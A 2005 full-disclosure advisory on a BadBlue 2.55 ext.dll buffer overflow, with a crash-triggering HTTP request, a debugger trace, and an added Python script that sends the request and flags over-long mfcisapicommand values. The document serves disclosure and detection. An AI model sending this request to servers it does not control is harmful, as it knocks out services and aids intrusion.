[Full-Disclosure] Badblue HTTP Server, ext.dll buffer overflow

Subject: [Full-Disclosure] Badblue HTTP Server, ext.dll buffer overflow
Date: Sat, 26 Feb 2005 18:30:16 +0100
SIA International Security Advisory - Badblue HTTP Server, ext.dll buffer overflow

* Release Date:
February 26, 2005

* Vendor:  
Working Resources Inc. http://www.badblue.com

* Versions Affected:
Confirmed under Badblue HTTP Server v2.55

* Severity:
Critical (remote code execution)

* Summary:
"BadBlue is not only a server, it's a complete file sharing system that is
simply easier and faster to use than anything else. Why? Because BadBlue
lets you use a tool you already know well: a web browser."
"In seconds, you can turn your PC into a powerful web server. You can easily
share photos, music, videos, and much more. With its simple menu-driven
interface and pop-up wizards to guide you through setup, there's no faster
way to share files"


* Technical Details:
SIA has discovered a buffer overflow in EXT.DLL, the module that handles
BadBlue HTTP requests. The overflow is triggered by a specially crafted HTTP
request whose mfcisapicommand parameter is longer than 250 characters. The
excess data overwrites several registers, so it is possible to execute code
or to cause a denial of service by shutting down the server. The following
request can be used to crash the remote server.

GET /ext.dll?mfcisapicommand=AAA...[250 chars]...AAA&page=index.htx

Windbg trace:
(360.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=026bda14 ebx=01130478 ecx=41414141 edx=0113057d esi=41414141 edi=77e2b495
eip=10042004 esp=026bd8f4 ebp=026bdbe0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for E:\BadBlue\PE\ext.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for E:\BadBlue\PE\ext.dll -
ext!GetExtensionVersion+0x13f7:
10042004 8b3e             mov     edi,[esi]
ds:0023:41414141=????????

The faulting instruction dereferences esi, which at this point holds
0x41414141 taken from the over-long parameter (ecx is clobbered the same
way), so the first-chance exception is a read through an attacker-controlled
pointer. Successful exploitation of this flaw could allow remote code
execution with Administrator rights, the privileges under which the BadBlue
process runs.
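The following script is an added example and is not part of the original advisory or of BadBlue. It builds the crash request described above with a configurable mfcisapicommand length, and pairs it with a detection check that flags request lines targeting ext.dll whose (URL-decoded) mfcisapicommand value exceeds the 250-character threshold from the advisory. The host, port, the 300-character default payload length, the HTTP/1.0 framing and the sample request lines are assumptions made for the example; the lab-only send_request helper is never called at import time.

```python
"""PoC request builder and matching detection check for the BadBlue 2.55
ext.dll mfcisapicommand overflow. Added example; host/port/lengths assumed."""
import socket
from urllib.parse import parse_qs, urlsplit

# Threshold from the advisory: values longer than 250 characters trigger the overflow.
MFC_CMD_LIMIT = 250


def build_request(payload_len=300, page="index.htx", host="127.0.0.1"):
    """Return the advisory's crash request as raw bytes.

    payload_len controls the length of the mfcisapicommand value; the
    advisory's request uses a run of 'A' characters. The HTTP/1.0 framing
    and Host header are assumptions (the advisory shows only the GET line).
    """
    payload = "A" * payload_len
    request = (
        f"GET /ext.dll?mfcisapicommand={payload}&page={page} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return request.encode("ascii")


def mfc_command_length(request_line):
    """Length of the URL-decoded mfcisapicommand value in a request line (0 if absent).

    Decoding matters: a value sent as %41%41... is still 'A'*n once the server
    unescapes it, so the check measures the decoded length.
    """
    parts = request_line.split()
    if len(parts) < 2:
        return 0
    query = urlsplit(parts[1]).query
    values = parse_qs(query, keep_blank_values=True).get("mfcisapicommand", [])
    return max((len(v) for v in values), default=0)


def is_overflow_attempt(request_line):
    """True when the request targets ext.dll with an over-long mfcisapicommand."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    path = urlsplit(parts[1]).path.lower()
    return path.endswith("/ext.dll") and mfc_command_length(request_line) > MFC_CMD_LIMIT


def send_request(host, port=80, payload_len=300, timeout=5.0):
    """Send the crash request to a lab host you own.

    Returns the response bytes, b'' if the server dropped the connection
    (consistent with the crash in the advisory), or None on read timeout.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(payload_len, host=host))
        try:
            return sock.recv(4096)
        except socket.timeout:
            return None
        except ConnectionResetError:
            return b""


# Constructed sample request lines (not real logs) used to exercise the check.
SAMPLE_REQUEST_LINES = [
    "GET /ext.dll?mfcisapicommand=loadpage&page=index.htx HTTP/1.0",
    "GET /ext.dll?mfcisapicommand=" + "A" * 300 + "&page=index.htx HTTP/1.0",
    "GET /ext.dll?mfcisapicommand=" + "%41" * 300 + "&page=index.htx HTTP/1.0",
    "GET /images/logo.gif HTTP/1.0",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUEST_LINES:
        flagged = is_overflow_attempt(line)
        print(f"{'ALERT ' if flagged else 'ok    '} len={mfc_command_length(line):4d} {line[:60]}")
```

The detection side deliberately measures the decoded value rather than matching a literal run of "A" characters: the trace above shows the overflow is about length, not content, so a filter keyed on "AAAA" would miss an encoded or non-repeating payload. Only point send_request at a BadBlue instance you control; a successful trigger takes the server down.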


* Solution:
Upgrade to the latest available version. At the time of writing the vendor
provides version 2.6 (v2.60), available for download at
http://www.badblue.com/bb98.exe

* Credits:
Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability

* Disclosure Timeline:
December     2004 - Discovered
December 20, 2004 - Initial Vendor Notification
December 21, 2004 - Initial Vendor Response
January 3,   2005 - Vendor Patch Released (v2.60)
February 26, 2005 - Public Disclosure

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html